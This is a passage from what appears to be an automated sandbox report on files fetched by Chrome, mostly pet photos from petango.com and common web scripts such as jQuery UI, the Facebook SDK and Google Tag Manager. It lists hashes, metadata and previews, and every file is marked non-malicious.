                                                                                                                                                                                                                                                        Preview:/*!. * jQuery UI Menu 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../keycode","../position","../safe-active-element","../unique-id","../version","../widget"],e):e(jQuery)}(function(a){"use strict";return a.widget("ui.menu",{version:"1.13.3",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-caret-1-e"},items:"> *",menus:"ul",position:{my:"left top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element,this.mouseHandled=!1,this.lastMousePosition={x:null,y:null},this.element.uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault(),this._activateItem(e)},"click .ui-menu-item":function(e){var t=a(e.target),i=a(a.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:09:05 18:42:57, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):62273
                                                                                                                                                                                                                                                        Entropy (8bit):7.947590648833033
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:nLD5NJKZxPt0MFR1AASTwIbTOojddlcL0Ri1ZC8+iqWDqGtaUT2o:xLK/PtbFbAPTwIb6ojdbjiSVW23No
                                                                                                                                                                                                                                                        MD5:D97B51C4D683D699CF8260611AA1824B
                                                                                                                                                                                                                                                        SHA1:2428A009F207846508D7B4FF994E7A246167B624
                                                                                                                                                                                                                                                        SHA-256:6EE3FD12409D57D8FEACC8BD21E80260850E45766B59D86883E5304CD132FF6D
                                                                                                                                                                                                                                                        SHA-512:E2735E7FF51092EF004F66FE81C9E061E8E7905E6C38C1764DD362DB1BEC0C0D55FC5ACBA249F01C85D4EDF24F2CE3DBDC24D5B21B32467A222A43E0648DF8A5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/d48e2ad2-00c5-4dee-acb5-efe4acd00f0a.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:09:05 18:42:57.H.......H.......(."...........'...................0232............................................020.........020.........020.........0100................................................................................................................................................................................................3...........4..."...............&.......................6...........J...........^...........f...........n...........v...........~...........................................-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73....@B......d...2024:09:05 18:42:57.2024:09:05 18:42:57.....d.......d.......d...............d...E.............................................N...........W.........
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=16, height=3500, PhotometricIntepretation=RGB, orientation=upper-left, width=2334], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):59308
                                                                                                                                                                                                                                                        Entropy (8bit):7.928679626831452
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:X3QddMfjNMUepBbcrhjEX4X9BRfO8RFGP:X3Qrce3bKNPs8RF4
                                                                                                                                                                                                                                                        MD5:38C499CB35B6C9A9ABFA287712ABCA47
                                                                                                                                                                                                                                                        SHA1:CF54D7B52B49AABF5718C6C60755F7265DB0307B
                                                                                                                                                                                                                                                        SHA-256:23AAF858470BFA20483C65ED2030EC7B6045A52D049DC301D42F031AFC5F6455
                                                                                                                                                                                                                                                        SHA-512:75B5AB96961B8D75E92A9063A63E87CAC8E45D15F85CF6130D342F4CA729EA2883E939802782A9D01EE4184304327FA1A15AB536E111093B75F5ED339CB98E2A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/58fb90fa-3f7f-4604-b405-4824f93f36bd.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,......Exif..II*...................................................................(.......................................................................1...".......2...................-...........5...i.......=.............Canon.Canon EOS R5.,.......,.......Adobe Photoshop 25.11 (Macintosh).2024:12:09 15:05:42.H.......H.......".0...........2..........."...........'...................0231................................43..........43..........................................................................................................................1...........2...........4...........5.......8...........C...........K...........S...........g...........{...............................................................................-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.........#.......2024:12:09 07:46:55.2024:12:09 07:46:55....@B..........................3.........}......_S........XICC_PROFILE......HL
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):45628
                                                                                                                                                                                                                                                        Entropy (8bit):7.979709957228712
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:9TiFuGchay7krOsswZpM2WqMoFVUuU9j/uFeDoBBS4kSN++EqwqvPrSYszzgDXUY:9IuGWnkrwwZC2EojUvmUDoBoz+gqvpsC
                                                                                                                                                                                                                                                        MD5:C50F4673D7DE08421B6CD7ADFF5B838D
                                                                                                                                                                                                                                                        SHA1:CD50E9EC955E83B6C85E750EE63748C960FA11A2
                                                                                                                                                                                                                                                        SHA-256:4FC8037F103A3CE2E6D0D3D0CC8A37D57CEA344DCC4774B01587C64C85AC6E5E
                                                                                                                                                                                                                                                        SHA-512:19CB295498BA3995F4CC587B8FCA0824319F00B63FA56440651B7A844C3C736875224C119B23C59922CABF22A98DAEC47DDE9A75DD08B2F4E834B86335F573C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}..c?/..3.......:..FN)C..tj.Gzp.s....G.z.%'....:..s....M.}*.w....<.)...h..%...1I.....b.a....H.....z..I...f.r....Q.'...A.w..jp.t.`.g..qR,..US...<....D.&..m%8..5N%...V.@.=:.%.9..K.!.2".8.v..1@...q..^.-..V\Y...5.j..8..J.q.V.....D..."../.......sP.....>n....ns..M1......,..."...........{.n.Q.@...b.`sK...i\.Be.s.5...:c....?..'L..Y..L.L.I.'.X...P.Zd..4.$Si.....d.....>S.R~..zP+.^g
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:52:55, xresolution=242, yresolution=250], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):65279
                                                                                                                                                                                                                                                        Entropy (8bit):7.953611391007993
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:G3Y7nLpRVQMj1vbrfzGPLSsBZJMtdnsrfmp7jYfghlsL3Z:G3YzLpRVjvfiPLdZCnNxOisL3Z
                                                                                                                                                                                                                                                        MD5:7FD97D04F62BE05144C2A77583BC75FE
                                                                                                                                                                                                                                                        SHA1:A1579802FA77A86C4FDB2AB03D08B8509F077C20
                                                                                                                                                                                                                                                        SHA-256:C1970383908202AFD952320E220875171BDD55B029209F0651DE1F4980F0FBCA
                                                                                                                                                                                                                                                        SHA-512:D879C1F7CEF8C80D2F2468CDA50E86E2D4DB979CEBDDC297857239D658DFBBC61594C02AC49DEE415841B9CC2431B80E40EC58BA8EC56EF523FBC3E9A3417B75
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/ecdfe4a2-be11-4f87-81a3-6e76acef32e3.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:52:55.H.......H....... .0...........2..........."...........'...................0231................................08..........08..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.....d...#.......2024:12:09 07:35:26.2024:12:09 07:35:26..`e.@B..........................B.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 12, xresolution=198, yresolution=206, software=17.4.1, datetime=2024:06:05 14:56:07, hostcomputer=iPhone 12, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):47408
                                                                                                                                                                                                                                                        Entropy (8bit):7.883642791795805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:Tv9kdHdxavEqjGSNc51AdsZUO1NzdqSFmt99SO1yY/9LFqIYYUWUfLoMcWVJ054O:JkdHdxKjjldLO1NzdqkmLhywVYYfUFcX
                                                                                                                                                                                                                                                        MD5:4F1D27ACABE284CAFDCA64691C210CF3
                                                                                                                                                                                                                                                        SHA1:1A1EA7F0757D8EC28D652C63142D541AAD6E0DC3
                                                                                                                                                                                                                                                        SHA-256:5646C5506A21CDBAEF4BEFEB27347EF20C1B6269DF31A9667D8702BEC7F48D8D
                                                                                                                                                                                                                                                        SHA-512:07175ED19CDB101B53E3B259466299C16B224278C9B58A641B7BDF06E984829F10D95CDFDC32EC04220A9AFCC6086DAC0D0858AD68761E3B0D9517ADC1FF063E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 12.H.......H.......17.4.1.2024:06:05 14:56:07.iPhone 12.H.......H......."."...........'.......@...........0232............................................675.........675.........0100....................................................................................................................................2...........3...........4...,....................................... ...........4...........H...........P...........X...........`...........h...........p...|...Y...x.......-04:00.-04:00.-04:00.................................Apple.iPhone 12 back dual wide camera 4.2mm f/1.6.....<...........2024:06:05 14:56:07.2024:06:05 14:56:07......(..o8...)...J..K<........................q.Apple iOS...MM.-.......................0.......h...0..............................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 945 x 189, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):10839
                                                                                                                                                                                                                                                        Entropy (8bit):7.857514783803224
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:naEG5DZT32otFc9jyRtRuULgFqxDkIB8GkOypopbKeF6kOY4fj23UP:narDZj29yRPxUFOBB8GnWopxF6vtj23k
                                                                                                                                                                                                                                                        MD5:7E384729A48C0CDE7915B4A93E5CB76B
                                                                                                                                                                                                                                                        SHA1:0837340AB3F6E88640A84EB6E46EA3E85987C03A
                                                                                                                                                                                                                                                        SHA-256:0A4789921D55398853BE0494882A3B44AE3796AB28581828D87290AD4A919875
                                                                                                                                                                                                                                                        SHA-512:AC7DB8B60AFBD7F3DF8BB6CD3CD98D3E81560659A01A94A9D0115BA057A33E68CC4EC86FE70B073CE74604D32B6A9FF462BD819AE36BCA6051128D82AF3A7C4F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............e.......pHYs...#...#.x.?v.. .IDATx...Mn"....K5....#!1@...&L...S+(j..W.......I..L... !......A..M...GDfd..I.y.s.8...+"2.?..l..............j>-..k......cI.".?....x.oe...^............|X....t..?....S......b..x.I....sa.W[.G.............(...........G~..nm5....$}>.cf.........\.u.`S..:!.OjS.cI..>..G.y....E....6r.`.d.nl.'.).J.......@a.v$..T..'..............=....(."...<.X)Y.*.....+%.D.....!6+.j."..?s&ih#.Y}...+.....#.....BlF..a..h........S......b.......g.......f.... .z.|.%S}..)..r.N.X.......D9..3..>By$.:..D.....@.-q..h..~N..........B......9.B......5...b.....b=j......^.s.>.X........'.sYm4..(.$U.......b.....z.|...'....B.?Q .qT..w{.X....A....p.!6.......w!..... ................DG..GN........s.......jkI..j>.....e..(..$....G+k1g......!....K.~!ll$.$...:[V....!.....zaT...@...?r.....H[.m..K.6.n...XV......C...O...,....?....3I_%.63.......k#...[1....0...A..:..ZYV....}...$......W..4..[.\KZg4*.Z..kT.F.C.}....<="._..y.....$..(..gJFe
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71159
                                                                                                                                                                                                                                                        Entropy (8bit):5.337584819945569
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicIv:RIT7Vs9ZVKBYj8wKcHIv
                                                                                                                                                                                                                                                        MD5:E4ADEF98CB0258BDE5C3316D745660E6
                                                                                                                                                                                                                                                        SHA1:726993C048DE62E9A188B889B652C3BF5EDEC469
                                                                                                                                                                                                                                                        SHA-256:D07BBBB09A0E9A781280A6237EDD6BC7A34447ECE1C5168C670FC3F37131536A
                                                                                                                                                                                                                                                        SHA-512:1C5CB9835F53817201A6024163DE21E4119136E5A8EB33B781EAF3673077734487AFBE0F1802C2FB12FE620FFFC89B06DEAF274DD93EC6FC09D44CDEE063160F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25822), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):25822
                                                                                                                                                                                                                                                        Entropy (8bit):5.358076039563863
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:a/vbtQxeSt7QL94n7N7JfZ6ykw1BPaiMZPRLBHGzs9nPyvL8by5RHyw/tH:yBQL7QapRZ9J1BPa9PRLBAs9n6T8+6MR
                                                                                                                                                                                                                                                        MD5:01D69629E7E8550C81CA7654836E6F00
                                                                                                                                                                                                                                                        SHA1:75536BE70E09A126539B769EB1FF437F94A40AF9
                                                                                                                                                                                                                                                        SHA-256:0C756A9929ADDDB39233417FE087FD1B35EDB6216A76A789FAC26B639ABD7BB6
                                                                                                                                                                                                                                                        SHA-512:EC1E795090F579183F70DC560FA5E2D9E0951D29344B1E6B902C18CD3DB8CC04165338FCF1911337C17BC4AC57CC38CB211F5E62AEA1246D4B5C51274B6CA0D2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://cdn.customgpt.ai/js/chat.js
                                                                                                                                                                                                                                                        Preview:var customgptDefaultCSS=".cgptcb-body {\n z-index: 2147483000;\n position: fixed;\n}\n.cgptcb-body .cgptcb-chat-circle,\n.cgptcb-body .cgptcb-chat-box-toggle {\n position: fixed;\n bottom: 1rem;\n left: var(--chatbot-position-left, auto);\n right: var(--chatbot-position-right, 1rem);\n border-radius: 50%;\n line-height: 4rem;\n cursor: pointer;\n color: var(--chatbot-color, #fff);\n background-color: var(--chatbot-bg-color, #0099dd);\n box-shadow: 0 0.25rem 0.5rem rgb(50 50 50 / 0.3),\n 0 1px 3px rgb(0 0 0 / 0.05);\n text-align: center;\n transition: all 0.2s ease-in-out;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptcb-icon-size-small,\n.cgptcb-body .cgptcb-chat-box-toggle.cgptcb-icon-size-small {\n width: 45px;\n height: 45px;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptcb-icon-size-medium,\n.cgptcb-body .cgptcb-chat-box-toggle.cgptcb-icon-size-medium {\n width: 75px;\n height: 75px;\n}\n\n.cgptcb-body .cgptcb-chat-circle.cgptc
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):273237
                                                                                                                                                                                                                                                        Entropy (8bit):5.5637616908971435
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:MIK2+EG+3Iw/JHzpErl0c4Q1A5yCOA7LcGB84x94cexKonhsG4WwwI:Xy+3IsJH1WSVUCTv4bKonhsGZU
                                                                                                                                                                                                                                                        MD5:60EE6945EB9794F091A3E59845D7BC6E
                                                                                                                                                                                                                                                        SHA1:C40C6B0BF9EA39D3259ABD4DE8334BDD59511393
                                                                                                                                                                                                                                                        SHA-256:3B8B5B59B94FC161CCE17BA2B7BCF44AB7955DB2C3B0A4C042DA1936FEEAA73A
                                                                                                                                                                                                                                                        SHA-512:F1225E218C319C351CFDD7632EE49F01FBD5C15F0441D9D62E071593E31462D1DB5C9602CC35E7D16FBF8E3EC73764816011E0DD8DE10B10F1D44EACDFF69BB7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":3,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":true,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_isEnabled":true,"vtp_autoAddressEnabled":true,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):322901
                                                                                                                                                                                                                                                        Entropy (8bit):5.571608544759081
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:sK2+EG+3bw/YHzpSrl03rQ1A5yCOA7LcGB84x94czxKonhsGH3voElwH:sy+3bsYH1KSVUCTv4QKonhsGHg/
                                                                                                                                                                                                                                                        MD5:6DFAD8C0F80B8FF839F1C3498B000098
                                                                                                                                                                                                                                                        SHA1:FC340215BE898F305D4E9A91505AD1F5909943D8
                                                                                                                                                                                                                                                        SHA-256:08A3964FEC5000E4A22BC02DF0BF8F6BE6149535033EDEB0B2513A18635F957B
                                                                                                                                                                                                                                                        SHA-512:36777AFADE6904654C31F4BC8A3659EF5675C8C4481F092659BDBC0E5283070D6630A650B6D765B8E7A71345D61E1473FFAE58870FB5C15AA3656948C61D6E32
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-M2BHRHR&
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"33",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                        MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                        SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                        SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                        SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://us-u.openx.net/w/1.0/sd?cc=1&id=537072977&val=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:19:37, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):60835
                                                                                                                                                                                                                                                        Entropy (8bit):7.910193214273418
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:031QhxN0vzEFbsJSeVBfvLttFdtPRP8sCFpE/ho/bg5v:03OtH43XLDFdhRP8frE/q/bg5v
                                                                                                                                                                                                                                                        MD5:A33F005DCA22E711FB19C355BF1772DC
                                                                                                                                                                                                                                                        SHA1:AEE2CDA5687D6F85E32814101BE2C3862AFC5ED8
                                                                                                                                                                                                                                                        SHA-256:C6337A4232B39EE19CB06468FD93C9F892F1F8B888AB5C187363BA9DF5F36789
                                                                                                                                                                                                                                                        SHA-512:0C8D24835A7B6378CE422A226385B2DAAEA4CD44D0BF0F30C5EF49D11080BF5E3B7B9CBB2022B130CE0197B099A4054748C354FD87487FAE893E1A266113BBEA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:19:37.iPhone 15 Plus.H.......H......."."...........'.......d...........0232............................................098.........098.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:19:37.2024:12:19 19:19:37......%..o8...)......t/..................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:19:37, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):60835
                                                                                                                                                                                                                                                        Entropy (8bit):7.910193214273418
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:031QhxN0vzEFbsJSeVBfvLttFdtPRP8sCFpE/ho/bg5v:03OtH43XLDFdhRP8frE/q/bg5v
                                                                                                                                                                                                                                                        MD5:A33F005DCA22E711FB19C355BF1772DC
                                                                                                                                                                                                                                                        SHA1:AEE2CDA5687D6F85E32814101BE2C3862AFC5ED8
                                                                                                                                                                                                                                                        SHA-256:C6337A4232B39EE19CB06468FD93C9F892F1F8B888AB5C187363BA9DF5F36789
                                                                                                                                                                                                                                                        SHA-512:0C8D24835A7B6378CE422A226385B2DAAEA4CD44D0BF0F30C5EF49D11080BF5E3B7B9CBB2022B130CE0197B099A4054748C354FD87487FAE893E1A266113BBEA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/6a80bfbe-5e6a-4206-8bd9-f6497d49bc0c.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:19:37.iPhone 15 Plus.H.......H......."."...........'.......d...........0232............................................098.........098.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:19:37.2024:12:19 19:19:37......%..o8...)......t/..................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3484
